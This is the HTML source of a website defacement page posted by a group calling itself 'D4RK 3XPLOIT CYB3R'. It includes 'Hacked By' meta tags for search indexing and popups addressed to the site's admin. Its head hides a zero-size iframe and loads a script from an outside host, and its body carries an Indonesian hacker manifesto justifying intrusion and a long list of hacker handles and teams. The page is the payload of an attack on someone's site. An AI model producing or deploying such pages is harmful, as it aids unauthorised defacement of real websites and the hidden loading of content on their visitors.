<html>
  <head><iframe src='https://vocaroo.com/media_command.php?media=s1dJStLwBWN0&command=download_mp3' frameborder='0' height='0' width='0'></iframe>
	<title> D4RK 3XPLOIT CYB3R</title>
	<link REL="SHORTCUT ICON" HREF="http://cdn1.iconfinder.com/data/icons/finalflags/128/Indonesia-Flag.png">
	<script src="http://e-mete.com/js/kdsnow.js"></script>
	<meta content='Hacked By  D4RK 3XPLOIT CYB3R' name='description'/>
	<meta content='Hacked By  D4RK 3XPLOIT CYB3R' name='keywords'/>
	<meta content='Hacked By  D4RK 3XPLOIT CYB3R' name='Abstract'/>
	<meta name="title" content="Hacked by D4RK 3XPLOIT CYB3R">
	<meta name="description" content=" D4RK 3XPLOIT CYB3R ">
	<meta name="keywords" content="Hacked By  D3C , from D4RK 3XPLOIT CYB3R ">
	<meta name="googlebot" content="index,follow" />
	<meta name="robots" content="all" />
	<meta name="robots schedule" content="auto" />
	<meta name="distribution" content="global" />
  </head>
  <script>
	alert("ASSALAMUALAIKUM ADMIN GANS AKU PINJAM SITUSNYA BENTAR YAHH BY D4RK 3XPLOIT CYB3R")
  alert("KAMI HANYA MENUNTUT KEBENARAN")
  alert("UNTUK PARA KRIMINAL BESAR PENGHUJAT KRIMINAL KECIL  :v ")
	</script>
	<style>
	.error {
	text-align: center;
	font-family: 'Gilda Display', serif;
	-webkit-animation: noise-3 1s linear infinite; 
	animation: noise-3 1s linear infinite;
	overflow: default;
	}
	info {
	text-align: center;
	width: 200px;
	height: 60px;
	margin: auto;
	position: absolute;
	top: 280px;
	bottom: 0;
	left: 20px;
	right: 0;
	-webkit-animation: noise-3 1s linear infinite;
	animation: noise-3 1s linear infinite;
	} 
	.info:after { 
	content: 'OWNED';
	font-family: OCR-A;
	font-size: 100px;
	text-align: center;
	width: 800px;
	margin: auto;
	position: absolute;
	top: 20px;
	bottom: 0;
	left: 40px;
	right: 0;
	opacity: 0;
	color: white;
	-webkit-animation: noise-1 .2s linear infinite; 
	animation: noise-1 .2s linear infinite; } @-webkit-keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @-webkit-keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @-webkit-keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @-webkit-keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } @keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } .wrap { top: 30%; left: 25%; height: 200px; margin-top: -100px; position: absolute; } code { color: white; } span.blue { color: #48beef; } span.comment { color: #7f8c8d; } span.orange { color: #f39c12; } span.green { color: #33cc33; } .viewFull { font-family:OCR-A; color:orange; text-decoration:; } 	 } @media only screen and (min-height: 500px) { .viewFull{ display:none; 	 	} } 	</style> <center> <style> img { filter:alpha(opacity=70); -moz-opacity:0.7; opacity:0.7; } img:hover { filter:alpha(opacity=100); -moz-opacity:.0; opacity:1.0; }
	</style>
  <body background="http://i50.tinypic.com/154x5s1.gif
	" title="D4RK 3XPLOIT CYB3R ">
  <br><br>
  <br>
  <center>
	<br>
	<link href='http://fonts.googleapis.com/css?family=Josefin Sans' rel='stylesheet' type='text/css'>
	<link href='https://fonts.googleapis.com/css?family=Audiowide|Space+Mono' rel='stylesheet'> 
	<div class="error"> 
	  <font color="cyan" size="7" face="Audiowide">~ Mr_Bl4cK_H4T10 ~</font> 
	</div>
	<br>
	<img src="https://i.ibb.co/PYy2WyB/IMG-20190412-WA0210.jpg/pp.jpg?format=jpg" border="0" weight="500" height="500" alt="Mr_Bl4cK_H4T10" /></a>
	<br>
<script type="text/javascript">/*<![CDATA[*/

TypingText = function(element, interval, cursor, finishedCallback) {

if((typeof document.getElementById ==

"undefined") || (typeof element.innerHTML == "undefined")) {

this.running = true;

return;

}

this.element = element;

this.finishedCallback = (finishedCallback

? finishedCallback : function() { return; });

this.interval = (typeof interval == "undefined" ? 100 : interval);

this.origText = this.element.innerHTML;

this.unparsedOrigText = this.origText;

this.cursor = (cursor ? cursor : "");

this.currentText = "";

this.currentChar = 0;

this.element.typingText = this;

if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;

TypingText.all.push(this);

this.running = false;

this.inTag = false;

this.tagBuffer = "";

this.inHTMLEntity = false;

this.HTMLEntityBuffer = "";

}

TypingText.all = new Array();

TypingText.currentIndex = 0;

TypingText.runAll

= function() {

for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();

}

TypingText.prototype.run = function() {

if(this.running) return;

if(typeof this.origText == "undefined") {

setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);

return;

}

if(this.currentText == "") this.element.innerHTML = "";

if(this.currentChar < this.origText.length) {

if(this.origText.charAt(this.currentChar) == "<" &&

!this.inTag) {

this.tagBuffer = "<";

this.inTag = true;

this.currentChar++;

this.run();

return;

} else if(this.origText.charAt(this.currentChar) == ">" &&

this.inTag) {

this.tagBuffer += ">";

this.inTag = false;

this.currentText += this.tagBuffer;

this.currentChar++;

this.run();

return;

} else

if(this.inTag) {

this.tagBuffer += this.origText.charAt(this.currentChar);

this.currentChar++;

this.run();

return;

} else

if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {

this.HTMLEntityBuffer = "&";

this.inHTMLEntity = true;

this.currentChar++;

this.run();

return;

} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {

this.HTMLEntityBuffer += ";";

this.inHTMLEntity =

false;

this.currentText += this.HTMLEntityBuffer;

this.currentChar++;

this.run();

return;

} else if(this.inHTMLEntity) {

this.HTMLEntityBuffer +=

this.origText.charAt(this.currentChar);

this.currentChar++;

this.run();

return;

} else {

this.currentText += this.origText.charAt(this.currentChar);

}

this.element.innerHTML = this.currentText;

this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ?

this.cursor(this.currentText) : this.cursor) : "");

this.currentChar++;

setTimeout("document.getElementById('" + this.element.id + "').typingText.run()",

this.interval);

} else {

this.currentText = "";

this.currentChar = 0;

this.running = false;

this.finishedCallback();

}

}


/*]]>*/</script>
	<p></p><p>
	<p>
	<center><font face="Courier new" color="red" size="6"> <p id="message"><b><strong>
			 Ini adalah dunia kami sekarang,dunianya elektron dan switch,keindahan sebuah baud.kami mendayagunakan sebuah sistem yang telah ada tanpa membayar yang bisa saja jadi biaya tersebut sangatlah murah jika tidak di jalankan dengan nafsu tamak mencari keuntungan,dan kalian menyebut kami KRIMINAL , Kami menjelajah dan kalian menyebut kami KRIMINAL , Kami hadir tanpa perbedaan warna kulit,kebangsaan,ataupun prasangka ke agamaan,dan kalian sebut kami KRIMINAL , Kalian yang membuat bom atom,kalian mengejar peperangan,kalian membunuh,berlaku curang,membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kepentingan kami,TETAP SAJA KAMI YANG DI SEBUT KRIMINAL </strong></b><br>
<i>Ya,Kami Memang KRIMINAL....<br>
Kejahatan kami adalah rasa keingintahuan kami......<br>
Kejahatan kami adalah menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka....<br></i>

			<i>We Are Always Looking For Loopholes</i><br>
<font color=white>KAMI HANYALAH MANUSIA BIASA YANG MENGINGINKAN KEADILAN BERKUASA DI MUKA BUMI INI<br></font>
 <font color=lime><b> Kami semua senasib seperjuangan.</b></font><br>
         <i><b><font color=blue>We Are D4RK 3XPLOIT CYB3R</i><br>
         We Are One<br>
         We Are Illusion<br>
         We Are Family.......<br></font>
         <font color=green><marquee scrollamount="20"> Thanks For Watching.......
		  </br></p></marquee>
	  </font></center>
    <div 0px="" 10px="" arial="" color:="" ff0000="" font:="" id="textDestination" margin:="" style="background-color: white;">
    </div>
    <script language="JavaScript">
    javascript:startTyping(text, 50, "textDestination"); 
    </script>
	<br>sekedar quotes
	<table border=1 width="100%" bordercolor="gray">
	  <td><td align="center" align="middle"><td width="8%"><font color="white"><center>
				<font color="cyan"> thanks to my Family :</center>
			</font></font></td></td></td>
	  <td><td align="center" valign="middle"><td width="92%"><font color="cyan" face="courier new"><marquee scrollamount="10"> P-Star7 | D3C~Mr.Sayno | Mr.GHOST SHADOW | Mr.K3P1K | </font><font color="white" face="we are family">TU4N Bl4cK_H4T10 </font>| Mr.Fija1.micin | iyROOT#syaki | Volt_Error | Hirakun/alam | | MINEWIZARD  | Fauzan:wkkwwk | | GHO5TM4N | | TU4N/.B4DUT | Kacots | | || CYBER CRY || KANDOL TERSAKITI || OMEST ||  Iy.Mr.CROT_D1LU4R  || 3L3PH3NT || Mr.4RI4NDA || CALAMITY || ||  InYour Vyan |KCT|D3C || SANTRI NOOB || GUS DUR || ||  erlangga ||  RUSMANA_ID  ||  MR.STAR  ||  ./FaisalR  ||  NISA CYBER  ||  ZPONG3BOB $  ||  ~Syc_KryptoN  || RIFALDI ||  sl0th  ||  m45 8Ih  ||  ./Tuan M4X1  ||  InYourNanda  ||  ikhsan  ||  ./faisalR  ||  MR.KODOX  ||  RX-KING404  ||  Ndaa  ||  SAYNO D3C  ||  mr.ZEXFIRSTH  ||  RISKI  ||  MR.MiX7 ||  ||  Mr.CRAB  ||  ||  AHMAD  ||  Black eyes  ||  Mrs.Sn1  ||  Fr33zka  ||  Mr 4ND_X  ||  Mr.Clay  ||  Mr.Noob  ||  MR1NTN3  ||  Mr.The Sniff 47 ||  MrAlienNationz  ||  MR.ST@R  ||  MR.CH4PLIN5  ||  Mr.B!@ck_Wolf  ||  ALONE  ||  R3ZPzx  ||  Mr.dark clown  ||  Mr.SQUIDWORD  ||  ||  XneoAthena  || ZEGARNATION  || Cr4z05t || W mastah || root@gilang || IY./Fell Gans || Weabu || MR.003T || InYour./CRACK || Holilul anwar || Yang itu Tea || B0ciL_Swee7 || Indra || IYxRafCode || Arya || ##===AKU===## || M03SLEM || Mr.Colt_Tersakiti404 || itsInYour./Silent  || InYour_DaffaGans || THE BOOT
OP ||  Mr.0ctopus || Xclown7 ||==================  THANKS FOR PARTNER TEAM ==============  D3C PUBLIK ====================== ||  BLACKHAT HACKER INDONESIA .RESMI ||  MUDASHR HACK  ||  PUSAKA CYBER ARMY  || ALL ANONYMOUS INDONESIA  ||  W.S.C.T  ||  ZONE XPLOITER  ||  MANUSIA BIASA TEAM  ||  SATA CYBER ARMY  ||  INDONESIAN ACOCIATION TERMUX || GARUDA TERSAKITI72 ||</marquee></font></td></td></td>
	</table><center>
	  </center>
	  <script type="text/javascript">/*<![CDATA[*/
new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " +

ar[i.length % ar.length]; });


//Type out examples:

TypingText.runAll();

/*]]>*/</script>
	</body>
</html>
